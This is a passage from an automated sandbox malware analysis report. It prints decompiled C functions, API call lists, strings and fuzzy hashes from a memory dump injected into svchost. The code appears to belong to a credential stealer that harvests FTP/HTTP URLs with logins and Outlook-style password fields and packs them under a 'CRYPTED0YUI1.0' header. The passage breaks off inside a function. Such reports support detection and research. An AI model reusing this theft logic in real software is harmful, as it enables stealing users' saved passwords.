                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 1000200F
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 1000201E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 10002025
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10002034
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3733816638-0
                                                                                                                                        • Opcode ID: a5e042e96ddfa17d9944cf055e53800ed9224505dcef65ff44debee41d5298b0
                                                                                                                                        • Instruction ID: 908f2fd6124b7aeb9f61400a225c527c45ebf35c0f2496cc7b6ec2ac2c5cf9e9
                                                                                                                                        • Opcode Fuzzy Hash: a5e042e96ddfa17d9944cf055e53800ed9224505dcef65ff44debee41d5298b0
                                                                                                                                        • Instruction Fuzzy Hash: 07110875680711BAFB319F74CC83F143A98EB01B90F248561B764BE0EFD6B5AA109A19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%

                                                                                                                                        Function 100064B3, Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100064B3(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char* _v12;
				intOrPtr _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				void* _t80;
				char* _t87;
				void* _t101;
				char* _t112;
				char* _t139;
				char* _t140;

				_t138 = __edx;
				_t137 = __ecx;
				_v16 = E10001091(_t80, __ebx, __edx, _a4);
				if(_v16 >= 0x10) {
					E100012E8(_t81, __edx, _a4);
					_v12 = 1;
					_v8 = E100013A0(__eflags, _a4,  &_v12);
					__eflags = _v12;
					if(_v12 == 0) {
						L5:
						return 1;
					} else {
						__eflags = _v8 - 2;
						if(_v8 < 2) {
							goto L5;
						} else {
							__eflags = _v8 - 6;
							if(__eflags <= 0) {
								_t87 = E100013A0(__eflags, _a4,  &_v12);
								__eflags = _v12;
								if(_v12 == 0) {
									L8:
									return 1;
								} else {
									__eflags = _t87;
									if(_t87 == 0) {
										__eflags = _v8 - 5;
										if(__eflags < 0) {
											_v32 = E100013A0(__eflags, _a4,  &_v12);
											E10001424( &_v12, __ecx, _a4, 4,  &_v12);
										} else {
											E10001424( &_v12, __ecx, _a4, 0x18,  &_v12);
											_v32 = E100013A0(__eflags, _a4,  &_v12);
										}
										E10006050(_t137, _a4,  &_v12);
										__eflags = _v32 - 1;
										if(__eflags == 0) {
											E10006343(_t137, _t138, __eflags, _a4, _a8, _v8,  &_v12);
											E10006050(_t137, _a4,  &_v12);
										}
										__eflags = _v12;
										if(__eflags != 0) {
											E10006343(_t137, _t138, __eflags, _a4, _a8, _v8,  &_v12);
											__eflags = _v12;
											if(__eflags != 0) {
												_t139 = E100013A0(__eflags, _a4,  &_v12);
												while(1) {
													__eflags = _v12;
													if(_v12 == 0) {
														break;
													}
													_t140 = _t139;
													__eflags = _t140;
													if(_t140 != 0) {
														_t101 = E100014DB(_a4);
														__eflags = _t101 - _v16;
														if(_t101 != _v16) {
															__eflags = _v8 - 6;
															if(__eflags >= 0) {
																E100013A0(__eflags, _a4,  &_v12);
																E10006050(_t137, _a4,  &_v12);
																E10006050(_t137, _a4,  &_v12);
															}
															_v20 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
															_v24 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
															_v28 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
															__eflags = _v20;
															if(_v20 != 0) {
																__eflags = _v24;
																if(_v24 != 0) {
																	__eflags = _v28;
																	if(_v28 != 0) {
																		__eflags = _v12;
																		if(_v12 != 0) {
																			_t112 = StrStrIA(_v20, "ftp://");
																			__eflags = _t112;
																			if(_t112 == 0) {
																				_t112 = StrStrIA(_v20, "http://");
																				__eflags = _t112;
																				if(_t112 == 0) {
																					_t112 = StrStrIA(_v20, "https://");
																				}
																			}
																			__eflags = _t112;
																			if(_t112 != 0) {
																				E10001522(_a8, 0xbeef0000);
																				E10001584(_a8, _v20);
																				E10001584(_a8, _v24);
																				E10001584(_a8, _v28);
																			}
																		}
																	}
																}
															}
															E10001871(_v20);
															E10001871(_v24);
															E10001871(_v28);
															_t139 = _t140 - 1;
															__eflags = _t139;
															continue;
														} else {
														}
													}
													break;
												}
												return _v12;
											} else {
												return 0;
											}
										} else {
											return 0;
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					}
				} else {
					return 1;
				}
			}
















                                                                                                                                        0x100064b3
                                                                                                                                        0x100064b3
                                                                                                                                        0x100064c2
                                                                                                                                        0x100064c9
                                                                                                                                        0x100064d8
                                                                                                                                        0x100064dd
                                                                                                                                        0x100064f0
                                                                                                                                        0x100064f3
                                                                                                                                        0x100064f7
                                                                                                                                        0x10006505
                                                                                                                                        0x1000650c
                                                                                                                                        0x100064f9
                                                                                                                                        0x100064f9
                                                                                                                                        0x100064fd
                                                                                                                                        0x00000000
                                                                                                                                        0x100064ff
                                                                                                                                        0x100064ff
                                                                                                                                        0x10006503
                                                                                                                                        0x10006516
                                                                                                                                        0x1000651b
                                                                                                                                        0x1000651f
                                                                                                                                        0x10006525
                                                                                                                                        0x1000652c
                                                                                                                                        0x10006521
                                                                                                                                        0x10006521
                                                                                                                                        0x10006523
                                                                                                                                        0x1000652f
                                                                                                                                        0x10006533
                                                                                                                                        0x10006560
                                                                                                                                        0x1000656c
                                                                                                                                        0x10006535
                                                                                                                                        0x1000653e
                                                                                                                                        0x1000654f
                                                                                                                                        0x1000654f
                                                                                                                                        0x10006578
                                                                                                                                        0x1000657d
                                                                                                                                        0x10006581
                                                                                                                                        0x10006590
                                                                                                                                        0x1000659c
                                                                                                                                        0x1000659c
                                                                                                                                        0x100065a1
                                                                                                                                        0x100065a5
                                                                                                                                        0x100065be
                                                                                                                                        0x100065c3
                                                                                                                                        0x100065c7
                                                                                                                                        0x100065df
                                                                                                                                        0x100066e1
                                                                                                                                        0x100066e1
                                                                                                                                        0x100066e5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100066e7
                                                                                                                                        0x100066e7
                                                                                                                                        0x100066e9
                                                                                                                                        0x100065e9
                                                                                                                                        0x100065ee
                                                                                                                                        0x100065f1
                                                                                                                                        0x100065f8
                                                                                                                                        0x100065fc
                                                                                                                                        0x10006605
                                                                                                                                        0x10006611
                                                                                                                                        0x1000661d
                                                                                                                                        0x1000661d
                                                                                                                                        0x1000662e
                                                                                                                                        0x1000663d
                                                                                                                                        0x1000664c
                                                                                                                                        0x1000664f
                                                                                                                                        0x10006653
                                                                                                                                        0x10006655
                                                                                                                                        0x10006659
                                                                                                                                        0x1000665b
                                                                                                                                        0x1000665f
                                                                                                                                        0x10006661
                                                                                                                                        0x10006665
                                                                                                                                        0x10006674
                                                                                                                                        0x10006674
                                                                                                                                        0x10006676
                                                                                                                                        0x10006685
                                                                                                                                        0x10006685
                                                                                                                                        0x10006687
                                                                                                                                        0x10006691
                                                                                                                                        0x10006691
                                                                                                                                        0x10006687
                                                                                                                                        0x10006696
                                                                                                                                        0x10006698
                                                                                                                                        0x100066a2
                                                                                                                                        0x100066ad
                                                                                                                                        0x100066b8
                                                                                                                                        0x100066c3
                                                                                                                                        0x100066c3
                                                                                                                                        0x10006698
                                                                                                                                        0x10006665
                                                                                                                                        0x1000665f
                                                                                                                                        0x10006659
                                                                                                                                        0x100066cb
                                                                                                                                        0x100066d3
                                                                                                                                        0x100066db
                                                                                                                                        0x100066e0
                                                                                                                                        0x100066e0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100065f3
                                                                                                                                        0x100065f1
                                                                                                                                        0x00000000
                                                                                                                                        0x100066e9
                                                                                                                                        0x100066f4
                                                                                                                                        0x100065c9
                                                                                                                                        0x100065d0
                                                                                                                                        0x100065d0
                                                                                                                                        0x100065a7
                                                                                                                                        0x100065ae
                                                                                                                                        0x100065ae
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006523
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006503
                                                                                                                                        0x100064fd
                                                                                                                                        0x100064cb
                                                                                                                                        0x100064d2
                                                                                                                                        0x100064d2

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ftp://$http://$https://
                                                                                                                                        • API String ID: 0-2804853444
                                                                                                                                        • Opcode ID: 912e31a90e7cd3ee126c7e246cb41169b457d85b349e360c934a324f1a7ac887
                                                                                                                                        • Instruction ID: 49d703680382d062719a75d7b5560dcea067daca85c923e5b649dc2b0f3700be
                                                                                                                                        • Opcode Fuzzy Hash: 912e31a90e7cd3ee126c7e246cb41169b457d85b349e360c934a324f1a7ac887
                                                                                                                                        • Instruction Fuzzy Hash: C061047980050DFAEF11DF90CC41AEEBBBAEF083C5F608061F915A5069D732AB95DB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 100019E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E100019E0(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				void* __ebx;
				void* __ebp;
				void* _t26;
				signed int _t40;
				signed int _t42;
				void* _t44;

				_t45 = __edx;
				_t44 = __ecx;
				_t42 = 0;
				_t26 =  &_v8;
				_push(_t26);
				_push(_a4);
				L1000BA64();
				if(_t26 >= 0) {
					_v16 = E10001091(_t26, 0, __edx, _a4);
					_t26 = GlobalLock(_v8);
					_t47 = _t26;
					if(_t26 != 0) {
						_v20 = _t26;
						_v12 = E10001888(_v16);
						E100018BF(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E100018F8(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
						E10001356(E10001963( &_v280, _v12, _v16), _t45, _a4);
						_t40 = E10001537(_a4, "CRYPTED0YUI1.0", 8);
						_t42 = _t40 & E10001537(_a4, _v12, _v16);
						_t26 = E10001871(_v12);
					}
				}
				E100012C2(_t26, _t45, _a4);
				return _t42;
			}














                                                                                                                                        0x100019e0
                                                                                                                                        0x100019e0
                                                                                                                                        0x100019ea
                                                                                                                                        0x100019ec
                                                                                                                                        0x100019ef
                                                                                                                                        0x100019f0
                                                                                                                                        0x100019f3
                                                                                                                                        0x100019fa
                                                                                                                                        0x10001a08
                                                                                                                                        0x10001a13
                                                                                                                                        0x10001a13
                                                                                                                                        0x10001a15
                                                                                                                                        0x10001a17
                                                                                                                                        0x10001a22
                                                                                                                                        0x10001a2e
                                                                                                                                        0x10001a36
                                                                                                                                        0x10001a4e
                                                                                                                                        0x10001a68
                                                                                                                                        0x10001a77
                                                                                                                                        0x10001a8c
                                                                                                                                        0x10001a91
                                                                                                                                        0x10001a91
                                                                                                                                        0x10001a15
                                                                                                                                        0x10001a99
                                                                                                                                        0x10001aa2

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 100019F3
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10001A0E
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 10001A36
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10001A3E
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                                                                                                        • String ID: CRYPTED0YUI1.0
                                                                                                                                        • API String ID: 4083238039-1217275205
                                                                                                                                        • Opcode ID: 567ace60eeaf6ab1a08dbb00e70395c75842e193db012652eee0cbfb56d9a6ca
                                                                                                                                        • Instruction ID: 667f95190686395c3df76180ac135867673b48139b4ad190086e5bc80b463836
                                                                                                                                        • Opcode Fuzzy Hash: 567ace60eeaf6ab1a08dbb00e70395c75842e193db012652eee0cbfb56d9a6ca
                                                                                                                                        • Instruction Fuzzy Hash: AB117779D0050DBFEF029FA0DC428EDBF76EF053C0F108561BA14A506ADB72AB65AB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.14%

                                                                                                                                        Function 1000B0DD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                        			E1000B0DD(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				void* _v3;
				void* _v8;
				intOrPtr _v12;
				char* _v16;
				void* __ebx;
				signed int _t15;
				int _t25;
				void* _t29;
				signed int _t33;

				_t33 = __edx ^ __eax;
				_t15 = __eax ^ _t33;
				_t34 = _t33 ^ _t15;
				_push(0x1000b0f7);
				asm("clc");
				if((_t33 ^ _t15) < 0) {
					asm("hlt");
					 *_t15 =  *_t15 + _t15;
					 *_t15 =  *_t15 + _t15;
					_t29 = 0;
					_t16 =  &_v8;
					_push(_t16);
					_push(_a4);
					L1000BA64();
					if(_t16 >= 0) {
						_v12 = E10001091(_t16, 0, _t34, _a4);
						_v16 = E10001888(_t22 + 1);
						_t25 = GlobalLock(_v8);
						_t16 = _t25;
						if(_t25 != 0) {
							E100018BF(_t16, _v16, _v12);
							_t16 = GlobalUnlock(_v8);
						}
					}
					E100012C2(_t16, _t34, _a4);
					if(_v16 != 0) {
						if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
							_t29 = 1;
						}
						E10001871(_v16);
					}
					return _t29;
				} else {
					return _t15;
				}
			}












                                                                                                                                        0x1000b0e4
                                                                                                                                        0x1000b0e6
                                                                                                                                        0x1000b0e8
                                                                                                                                        0x1000b0ea
                                                                                                                                        0x1000b0f0
                                                                                                                                        0x1000b0f2
                                                                                                                                        0x1000b0f9
                                                                                                                                        0x1000b0fa
                                                                                                                                        0x1000b0fc
                                                                                                                                        0x1000b0fe
                                                                                                                                        0x1000b100
                                                                                                                                        0x1000b103
                                                                                                                                        0x1000b104
                                                                                                                                        0x1000b107
                                                                                                                                        0x1000b10e
                                                                                                                                        0x1000b118
                                                                                                                                        0x1000b122
                                                                                                                                        0x1000b128
                                                                                                                                        0x1000b12d
                                                                                                                                        0x1000b12f
                                                                                                                                        0x1000b138
                                                                                                                                        0x1000b140
                                                                                                                                        0x1000b140
                                                                                                                                        0x1000b12f
                                                                                                                                        0x1000b148
                                                                                                                                        0x1000b151
                                                                                                                                        0x1000b162
                                                                                                                                        0x1000b164
                                                                                                                                        0x1000b164
                                                                                                                                        0x1000b16c
                                                                                                                                        0x1000b16c
                                                                                                                                        0x1000b175
                                                                                                                                        0x1000b0f5
                                                                                                                                        0x1000b0f5
                                                                                                                                        0x1000b0f5

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,1000B0F7), ref: 1000B107
                                                                                                                                        • GlobalLock.KERNEL32 ref: 1000B128
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,?,?,?,00000001,?,?,?,1000B0F7), ref: 1000B140
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,1000B0F7), ref: 1000B15B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLockStreamUnlock
                                                                                                                                        • String ID: STATUS-IMPORT-OK
                                                                                                                                        • API String ID: 2287449323-1591331578
                                                                                                                                        • Opcode ID: 55db0062bef06cf4ed714bf1f1a21096e2e47512b03e507c76ad138cf5971688
                                                                                                                                        • Instruction ID: 09f84e8c5236a89e3fb2385dfb927d7899cf37e895495d05523066b617484809
                                                                                                                                        • Opcode Fuzzy Hash: 55db0062bef06cf4ed714bf1f1a21096e2e47512b03e507c76ad138cf5971688
                                                                                                                                        • Instruction Fuzzy Hash: A6012D79E04608BBFF02DFB1CC869ED7BB6EF012C4F158171B920A506ADB359E519B10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.13%

                                                                                                                                        Function 100023E6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E100023E6(void* __eflags, CHAR* _a4) {
				int _t6;
				char* _t8;
				char* _t10;
				CHAR* _t16;

				_t16 = E10001DB1(_a4, 0);
				_t6 = lstrlenA(_a4);
				if(_t6 > 1) {
					_push(_t16);
					if( *_t16 == 0x22) {
						asm("cld");
						_t3 =  &(_t16[1]); // 0x1
						memcpy(_t16, _t3, _t6);
					}
					_pop(_t16);
				}
				_t8 = StrStrIA(_t16, ".exe");
				if(_t8 != 0) {
					 *((char*)(_t8 + 4)) = 0;
				}
				_t10 = StrRChrIA(_t16, 0, 0x5c);
				if(_t10 == 0) {
					 *_t16 = 0;
				} else {
					 *_t10 = 0;
				}
				if(lstrlenA(_t16) <= 3) {
					 *_t16 = 0;
				}
				return _t16;
			}







                                                                                                                                        0x100023f5
                                                                                                                                        0x100023fa
                                                                                                                                        0x10002402
                                                                                                                                        0x10002404
                                                                                                                                        0x10002408
                                                                                                                                        0x1000240a
                                                                                                                                        0x1000240b
                                                                                                                                        0x10002410
                                                                                                                                        0x10002410
                                                                                                                                        0x10002412
                                                                                                                                        0x10002412
                                                                                                                                        0x1000241e
                                                                                                                                        0x10002420
                                                                                                                                        0x10002422
                                                                                                                                        0x10002422
                                                                                                                                        0x10002430
                                                                                                                                        0x10002432
                                                                                                                                        0x10002439
                                                                                                                                        0x10002434
                                                                                                                                        0x10002434
                                                                                                                                        0x10002434
                                                                                                                                        0x10002445
                                                                                                                                        0x10002447
                                                                                                                                        0x10002447
                                                                                                                                        0x1000244f

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 100023FA
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
                                                                                                                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
                                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID: .exe
                                                                                                                                        • API String ID: 2414487701-4119554291
                                                                                                                                        • Opcode ID: 7368e76ac8cf2b5910bbbd2622d3acca2e6718c7255de29e814e3f1de290cb41
                                                                                                                                        • Instruction ID: e5b6aec9dedf11539089d9f986a9e3465204e9dad837d82f3043fca0b857f623
                                                                                                                                        • Opcode Fuzzy Hash: 7368e76ac8cf2b5910bbbd2622d3acca2e6718c7255de29e814e3f1de290cb41
                                                                                                                                        • Instruction Fuzzy Hash: 14F0F635604582B9FB22E724CC42F6FBFC5DB936C0F154061F6009B18ED768E8129372
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000A074, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                        			E1000A074(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				unsigned int _v40;
				void* _v44;
				char _v48;
				void* _t45;
				char _t48;
				char* _t50;
				char* _t59;
				char _t62;
				char _t65;
				char _t67;
				char* _t68;
				char _t70;
				char _t75;
				char _t83;
				char* _t84;
				char* _t85;
				char* _t86;

				_t45 = E10001EEF(_a8);
				if(_t45 != 0) {
					"_OP3_Password2" = 0x50;
					"_MTP_Password2" = 0x53;
					_t48 = E10001FB7(__eflags, _a8,  &_v20);
					__eflags = _t48;
					if(_t48 != 0) {
						_push(_v8);
						_pop( *_t5);
						_v40 = _v40 >> 1;
						_t50 = E10002A17(_v12, _v40);
						__eflags = _t50;
						if(_t50 == 0) {
							_v24 = E10001888(_v8);
							E100018BF(_v12, _v24, _v8);
							_t85 = _v24;
						} else {
							_v24 = _t50;
							_t85 = _t50;
						}
						while(1) {
							_t86 = _t85;
							__eflags = _t86;
							if(_t86 == 0) {
								break;
							}
							__eflags =  *_t86;
							if( *_t86 != 0) {
								_t84 = "<_OP3_Password2";
								while(1) {
									_t59 = StrStrA(_t86, _t84);
									__eflags = _t59;
									if(_t59 != 0) {
										break;
									}
									L10:
									asm("cld");
									asm("repne scasb");
									__eflags =  *_t84;
									if( *_t84 != 0) {
										continue;
									}
									goto L24;
								}
								_t62 = StrStrIA(_t59, 0x100106a9);
								__eflags = _t62;
								if(_t62 != 0) {
									_t85 = _t62 + 1;
									_v28 = _t85;
									_t65 = StrStrA(_t85, 0x100106ab);
									__eflags = _t65;
									if(_t65 != 0) {
										 *_t65 = 0;
										_push(_t65);
										_push( *_t65);
										_t67 = lstrlenA(_v28);
										__eflags = _t67;
										if(_t67 != 0) {
											_v32 = _t67;
											_v36 = E100029F6(_v28);
											_t70 = E10002AE6(_v36, _v32);
											__eflags = _t70;
											if(_t70 != 0) {
												_v32 = _v32 >> 1;
												 *_t26 =  *0x100106a1;
												 *_t27 =  *0x100106a5;
												_t75 = E100043D4(_v36,  &_v32,  &_v48);
												__eflags = _t75;
												if(_t75 != 0) {
													E10001522(_a4, 0xbeef0001);
													E10001584(_a4, _v28);
													E10001558(_a4, _v36, _v32);
												}
											}
											E10001871(_v36);
										}
										_pop(_t83);
										_pop(_t68);
										 *_t68 = _t83;
										continue;
									}
								} else {
								}
							}
							break;
						}
						L24:
						E10001522(_a4, 0xbeef0002);
						E10001558(_a4, _v12, _v8);
						E10001871(_v24);
						return E1000204C( &_v20);
					}
					return _t48;
				} else {
					return _t45;
				}
			}



























                                                                                                                                        0x1000a084
                                                                                                                                        0x1000a086
                                                                                                                                        0x1000a08e
                                                                                                                                        0x1000a095
                                                                                                                                        0x1000a0a8
                                                                                                                                        0x1000a0a8
                                                                                                                                        0x1000a0aa
                                                                                                                                        0x1000a0b0
                                                                                                                                        0x1000a0b3
                                                                                                                                        0x1000a0b6
                                                                                                                                        0x1000a0c4
                                                                                                                                        0x1000a0c4
                                                                                                                                        0x1000a0c6
                                                                                                                                        0x1000a0d7
                                                                                                                                        0x1000a0e3
                                                                                                                                        0x1000a0e8
                                                                                                                                        0x1000a0c8
                                                                                                                                        0x1000a0c8
                                                                                                                                        0x1000a0cb
                                                                                                                                        0x1000a0cb
                                                                                                                                        0x1000a1d0
                                                                                                                                        0x1000a1d0
                                                                                                                                        0x1000a1d0
                                                                                                                                        0x1000a1d2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a1d4
                                                                                                                                        0x1000a1d7
                                                                                                                                        0x1000a0f0
                                                                                                                                        0x1000a0f5
                                                                                                                                        0x1000a0fc
                                                                                                                                        0x1000a0fc
                                                                                                                                        0x1000a0fe
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a102
                                                                                                                                        0x1000a102
                                                                                                                                        0x1000a10a
                                                                                                                                        0x1000a10c
                                                                                                                                        0x1000a10e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a110
                                                                                                                                        0x1000a122
                                                                                                                                        0x1000a122
                                                                                                                                        0x1000a124
                                                                                                                                        0x1000a12c
                                                                                                                                        0x1000a12e
                                                                                                                                        0x1000a13c
                                                                                                                                        0x1000a13c
                                                                                                                                        0x1000a13e
                                                                                                                                        0x1000a147
                                                                                                                                        0x1000a14a
                                                                                                                                        0x1000a14b
                                                                                                                                        0x1000a154
                                                                                                                                        0x1000a154
                                                                                                                                        0x1000a156
                                                                                                                                        0x1000a158
                                                                                                                                        0x1000a163
                                                                                                                                        0x1000a16c
                                                                                                                                        0x1000a171
                                                                                                                                        0x1000a173
                                                                                                                                        0x1000a175
                                                                                                                                        0x1000a17e
                                                                                                                                        0x1000a187
                                                                                                                                        0x1000a195
                                                                                                                                        0x1000a19a
                                                                                                                                        0x1000a19c
                                                                                                                                        0x1000a1a6
                                                                                                                                        0x1000a1b1
                                                                                                                                        0x1000a1bf
                                                                                                                                        0x1000a1bf
                                                                                                                                        0x1000a19c
                                                                                                                                        0x1000a1c7
                                                                                                                                        0x1000a1c7
                                                                                                                                        0x1000a1cc
                                                                                                                                        0x1000a1cd
                                                                                                                                        0x1000a1ce
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a1ce
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a126
                                                                                                                                        0x1000a124
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a1d7
                                                                                                                                        0x1000a1dd
                                                                                                                                        0x1000a1e5
                                                                                                                                        0x1000a1f3
                                                                                                                                        0x1000a1fb
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a204
                                                                                                                                        0x1000a20e
                                                                                                                                        0x1000a08b
                                                                                                                                        0x1000a08b
                                                                                                                                        0x1000a08b

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: <_OP3_Password2
                                                                                                                                        • API String ID: 0-4172175086
                                                                                                                                        • Opcode ID: 2fac08e10c7b54eb26d01850342edd58a46d29693a526b4ae4446b405374f271
                                                                                                                                        • Instruction ID: f81c72a808c018f294bf42a4d9c9917b2556b39f38b9f1046e23d85fd33ef87d
                                                                                                                                        • Opcode Fuzzy Hash: 2fac08e10c7b54eb26d01850342edd58a46d29693a526b4ae4446b405374f271
                                                                                                                                        • Instruction Fuzzy Hash: 1F417F7690440AEEEF12DBA0CC029EE7FB6EF463D0F154120F550B6069D7359EA1EB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 10009CDE, Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                        			E10009CDE(char* _a4, short* _a8, intOrPtr _a12) {
				unsigned int _v8;
				char* _v12;
				int _v16;
				int _t24;
				char* _t28;
				int _t29;
